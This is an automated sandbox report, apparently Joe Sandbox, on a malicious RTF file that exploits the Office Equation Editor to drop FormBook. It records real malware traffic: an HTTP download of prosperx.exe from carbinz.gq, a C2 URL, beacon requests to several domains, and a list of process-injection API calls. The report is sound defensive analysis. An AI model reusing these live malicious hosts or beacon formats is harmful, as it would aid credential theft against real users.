Source: C:\Users\user\AppData\Local\Temp\nsxAB11.tmp\ghvea31n0uw.dll	ReversingLabs: Detection: 20%
Source: C:\Users\user\AppData\Roaming\propser16364.exe	ReversingLabs: Detection: 65%

Multi AV Scanner detection for submitted file

Source: c8080fbf_by_Libranalysis.rtf	Virustotal: Detection: 50%			Perma Link
Source: c8080fbf_by_Libranalysis.rtf	ReversingLabs: Detection: 51%

Yara detected FormBook

Source: Yara match	File source: 00000005.00000002.2121650359.0000000000540000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2343971435.0000000000200000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2343918572.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2343785515.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2090889243.0000000000450000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000001.2087019279.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2121531163.0000000000270000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2121620197.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.1.propser16364.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.1.propser16364.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.propser16364.exe.450000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.propser16364.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.propser16364.exe.450000.3.unpack, type: UNPACKEDPE

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\propser16364.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\prosperx[1].exe	Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 5.1.propser16364.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.2.propser16364.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 4.2.propser16364.exe.450000.3.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\propser16364.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\propser16364.exe			Jump to behavior

Office Equation Editor has been started

Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: wntdll.pdb source: propser16364.exe, NAPSTAT.EXE
Source:	Binary string: napstat.pdb source: propser16364.exe, 00000005.00000002.2123186135.0000000002440000.00000040.00000001.sdmp

Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 4_2_004059F0 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	4_2_004059F0
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 4_2_0040659C FindFirstFileA,FindClose,	4_2_0040659C
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 4_2_004027A1 FindFirstFileA,	4_2_004027A1

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 4x nop then pop edi		5_2_0040E445
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 4x nop then pop edi		7_2_0008E445

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: carbinz.gq

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 185.239.243.112:80

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 185.239.243.112:80

Networking:

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.shoprodeovegas.com/xcl/

Downloads executable code via HTTP

Source: global traffic

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /xcl/?ZVeHz=RmzwS/19amak9riNwxnkKWY/GrwQkk+Z9h+s+sO794NmAWuM+4hewKU4PkGr68hD/xJogQ==&-ZAh4=mxo8s0M0KXs4hlP0 HTTP/1.1Host: www.devarajantraders.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /xcl/?ZVeHz=BgLP7+VyAbe+irQ8z0wpLO49yx16Kwx4jjQ33/W3X+9zq2VbrBj/CRN5ENeCInervJ/P3w==&-ZAh4=mxo8s0M0KXs4hlP0 HTTP/1.1Host: www.photograph-gallery.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 185.239.243.112 185.239.243.112

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: CLOUDIE-AS-APCloudieLimitedHK CLOUDIE-AS-APCloudieLimitedHK
Source: Joe Sandbox View	ASN Name: POWERLINE-AS-APPOWERLINEDATACENTERHK POWERLINE-AS-APPOWERLINEDATACENTERHK

Uses a known web browser user agent for HTTP communication

Source: global traffic

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{0EAA9687-30AB-4901-9D2A-3CE504568F55}.tmp

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /modex/prosperx.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: carbinz.gqConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xcl/?ZVeHz=RmzwS/19amak9riNwxnkKWY/GrwQkk+Z9h+s+sO794NmAWuM+4hewKU4PkGr68hD/xJogQ==&-ZAh4=mxo8s0M0KXs4hlP0 HTTP/1.1Host: www.devarajantraders.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /xcl/?ZVeHz=BgLP7+VyAbe+irQ8z0wpLO49yx16Kwx4jjQ33/W3X+9zq2VbrBj/CRN5ENeCInervJ/P3w==&-ZAh4=mxo8s0M0KXs4hlP0 HTTP/1.1Host: www.photograph-gallery.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: explorer.exe, 00000006.00000000.2095904163.0000000003C40000.00000002.00000001.sdmp

String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)

Source: unknown

DNS traffic detected: queries for: carbinz.gq

Source: explorer.exe, 00000006.00000000.2110454331.000000000A330000.00000008.00000001.sdmp	String found in binary or memory: http://%s.com
Source: explorer.exe, 00000006.00000000.2110454331.000000000A330000.00000008.00000001.sdmp	String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 00000006.00000000.2097604742.0000000004B50000.00000002.00000001.sdmp	String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000006.00000000.2095904163.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000006.00000000.2095904163.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com/
Source: propser16364.exe, propser16364.exe, 00000004.00000002.2090838235.000000000040A000.00000004.00020000.sdmp, propser16364.exe, 00000005.00000000.2082976494.000000000040A000.00000008.00020000.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: propser16364.exe, 00000004.00000002.2090838235.000000000040A000.00000004.00020000.sdmp, propser16364.exe, 00000005.00000000.2082976494.000000000040A000.00000008.00020000.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: propser16364.exe, 00000004.00000002.2091013839.0000000001E80000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000006.00000000.2098818599.0000000004F30000.00000002.00000001.sdmp	String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000006.00000000.2103498996.0000000008471000.00000004.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
Source: explorer.exe, 00000006.00000000.2091126769.00000000002BB000.00000004.00000020.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: explorer.exe, 00000006.00000000.2110454331.000000000A330000.00000008.00000001.sdmp	String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000006.00000000.2097604742.0000000004B50000.00000002.00000001.sdmp	String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000006.00000000.2110454331.000000000A330000.00000008.00000001.sdmp	String found in binary or memory: http://www.%s.com
Source: propser16364.exe, 00000004.00000002.2091013839.0000000001E80000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000006.00000000.2097604742.0000000004B50000.00000002.00000001.sdmp	String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000006.00000000.2095904163.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000006.00000000.2097604742.0000000004B50000.00000002.00000001.sdmp	String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 00000006.00000000.2096487428.0000000004263000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/?ocid=iehpeM9
Source: explorer.exe, 00000006.00000000.2096487428.0000000004263000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/?ocid=iehpxe
Source: explorer.exe, 00000006.00000000.2096487428.0000000004263000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
Source: explorer.exe, 00000006.00000000.2096487428.0000000004263000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/de-de/?ocid=iehp2
Source: explorer.exe, 00000006.00000000.2095904163.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000006.00000000.2091092404.0000000000260000.00000004.00000020.sdmp	String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000006.00000000.2091092404.0000000000260000.00000004.00000020.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000006.00000000.2095904163.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 00000006.00000000.2096418331.00000000041AD000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.2103498996.0000000008471000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
Source: explorer.exe, 00000006.00000000.2096418331.00000000041AD000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1/
Source: explorer.exe, 00000006.00000000.2096418331.00000000041AD000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=17
Source: explorer.exe, 00000006.00000000.2103498996.0000000008471000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1LMEM

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality for read data from the clipboard

Source: C:\Users\user\AppData\Roaming\propser16364.exe

4_2_0040548D

E-Banking Fraud:

Yara detected FormBook

Source: Yara match	File source: 00000005.00000002.2121650359.0000000000540000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2343971435.0000000000200000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2343918572.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2343785515.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2090889243.0000000000450000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000001.2087019279.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2121531163.0000000000270000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2121620197.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.1.propser16364.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.1.propser16364.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.propser16364.exe.450000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.propser16364.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.propser16364.exe.450000.3.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Source: 00000005.00000002.2121650359.0000000000540000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.2121650359.0000000000540000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.2343971435.0000000000200000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2343971435.0000000000200000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.2343918572.00000000001B0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2343918572.00000000001B0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.2343785515.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2343785515.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.2090889243.0000000000450000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.2090889243.0000000000450000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000001.2087019279.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000001.2087019279.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.2121531163.0000000000270000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.2121531163.0000000000270000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.2121620197.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.2121620197.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.1.propser16364.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.1.propser16364.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.1.propser16364.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.1.propser16364.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.propser16364.exe.450000.3.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.propser16364.exe.450000.3.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.propser16364.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.propser16364.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\propser16364.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\prosperx[1].exe			Jump to dropped file

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Users\user\AppData\Roaming\propser16364.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Memory allocated: 76D20000 page execute and read and write	Jump to behavior

Contains functionality to call native functions

Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_00419D60 NtCreateFile,	5_2_00419D60
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_00419E10 NtReadFile,	5_2_00419E10
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_00419E90 NtClose,	5_2_00419E90
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_00419F40 NtAllocateVirtualMemory,	5_2_00419F40
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_00419E0A NtReadFile,	5_2_00419E0A
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_00419E8A NtClose,	5_2_00419E8A
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_00419F3F NtAllocateVirtualMemory,	5_2_00419F3F
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_008300C4 NtCreateFile,LdrInitializeThunk,	5_2_008300C4
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_00830048 NtProtectVirtualMemory,LdrInitializeThunk,	5_2_00830048
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_00830078 NtResumeThread,LdrInitializeThunk,	5_2_00830078
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0082F9F0 NtClose,LdrInitializeThunk,	5_2_0082F9F0
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0082F900 NtReadFile,LdrInitializeThunk,	5_2_0082F900
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0082FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,	5_2_0082FAD0
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0082FAE8 NtQueryInformationProcess,LdrInitializeThunk,	5_2_0082FAE8
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0082FBB8 NtQueryInformationToken,LdrInitializeThunk,	5_2_0082FBB8
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0082FB68 NtFreeVirtualMemory,LdrInitializeThunk,	5_2_0082FB68
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0082FC90 NtUnmapViewOfSection,LdrInitializeThunk,	5_2_0082FC90
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0082FC60 NtMapViewOfSection,LdrInitializeThunk,	5_2_0082FC60
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0082FD8C NtDelayExecution,LdrInitializeThunk,	5_2_0082FD8C
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0082FDC0 NtQuerySystemInformation,LdrInitializeThunk,	5_2_0082FDC0
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0082FEA0 NtReadVirtualMemory,LdrInitializeThunk,	5_2_0082FEA0
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0082FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,	5_2_0082FED0
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0082FFB4 NtCreateSection,LdrInitializeThunk,	5_2_0082FFB4
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_008310D0 NtOpenProcessToken,	5_2_008310D0
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_00830060 NtQuerySection,	5_2_00830060
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_008301D4 NtSetValueKey,	5_2_008301D4
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0083010C NtOpenDirectoryObject,	5_2_0083010C
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_00831148 NtOpenThread,	5_2_00831148
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_008307AC NtCreateMutant,	5_2_008307AC
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0082F8CC NtWaitForSingleObject,	5_2_0082F8CC
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_00831930 NtSetContextThread,	5_2_00831930
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0082F938 NtWriteFile,	5_2_0082F938
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0082FAB8 NtQueryValueKey,	5_2_0082FAB8
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0082FA20 NtQueryInformationFile,	5_2_0082FA20
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0082FA50 NtEnumerateValueKey,	5_2_0082FA50
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0082FBE8 NtQueryVirtualMemory,	5_2_0082FBE8
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0082FB50 NtCreateKey,	5_2_0082FB50
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0082FC30 NtOpenProcess,	5_2_0082FC30
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_00830C40 NtGetContextThread,	5_2_00830C40
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0082FC48 NtSetInformationFile,	5_2_0082FC48
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_00831D80 NtSuspendThread,	5_2_00831D80
Source: C:\Users\user\AppData\Roaming\propser16364.exe	Code function: 5_2_0082FD5C NtEnumerateKey,	5_2_0082FD5C
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00A900C4 NtCreateFile,LdrInitializeThunk,	7_2_00A900C4
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00A907AC NtCreateMutant,LdrInitializeThunk,	7_2_00A907AC
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00A8F9F0 NtClose,LdrInitializeThunk,	7_2_00A8F9F0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00A8F900 NtReadFile,LdrInitializeThunk,	7_2_00A8F900
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00A8FAB8 NtQueryValueKey,LdrInitializeThunk,	7_2_00A8FAB8
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00A8FAE8 NtQueryInformationProcess,LdrInitializeThunk,	7_2_00A8FAE8
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00A8FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,	7_2_00A8FAD0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00A8FBB8 NtQueryInformationToken,LdrInitializeThunk,	7_2_00A8FBB8
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00A8FB68 NtFreeVirtualMemory,LdrInitializeThunk,	7_2_00A8FB68
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00A8FB50 NtCreateKey,LdrInitializeThunk,	7_2_00A8FB50
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00A8FC60 NtMapViewOfSection,LdrInitializeThunk,	7_2_00A8FC60
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00A8FD8C NtDelayExecution,LdrInitializeThunk,	7_2_00A8FD8C
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00A8FDC0 NtQuerySystemInformation,LdrInitializeThunk,	7_2_00A8FDC0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00A8FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,	7_2_00A8FED0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00A8FFB4 NtCreateSection,LdrInitializeThunk,	7_2_00A8FFB4
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00A910D0 NtOpenProcessToken,	7_2_00A910D0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00A90060 NtQuerySection,	7_2_00A90060
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00A90078 NtResumeThread,	7_2_00A90078
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00A90048 NtProtectVirtualMemory,	7_2_00A90048
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00A901D4 NtSetValueKey,	7_2_00A901D4
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00A9010C NtOpenDirectoryObject,	7_2_00A9010C
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00A91148 NtOpenThread,	7_2_00A91148
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00A8F8CC NtWaitForSingleObject,	7_2_00A8F8CC
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00A8F938 NtWriteFile,	7_2_00A8F938
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00A91930 NtSetContextThread,	7_2_00A91930
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00A8FA20 NtQueryInformationFile,	7_2_00A8FA20
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00A8FA50 NtEnumerateValueKey,	7_2_00A8FA50
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00A8FBE8 NtQueryVirtualMemory,	7_2_00A8FBE8
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00A8FC90 NtUnmapViewOfSection,	7_2_00A8FC90
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00A8FC30 NtOpenProcess,	7_2_00A8FC30
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00A8FC48 NtSetInformationFile,	7_2_00A8FC48
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00A90C40 NtGetContextThread,	7_2_00A90C40
Source: C:\Windows\SysWOW64\NAPSTAT.EXE	Code function: 7_2_00A91D80 NtSuspendThread,	7_2_00A91D80
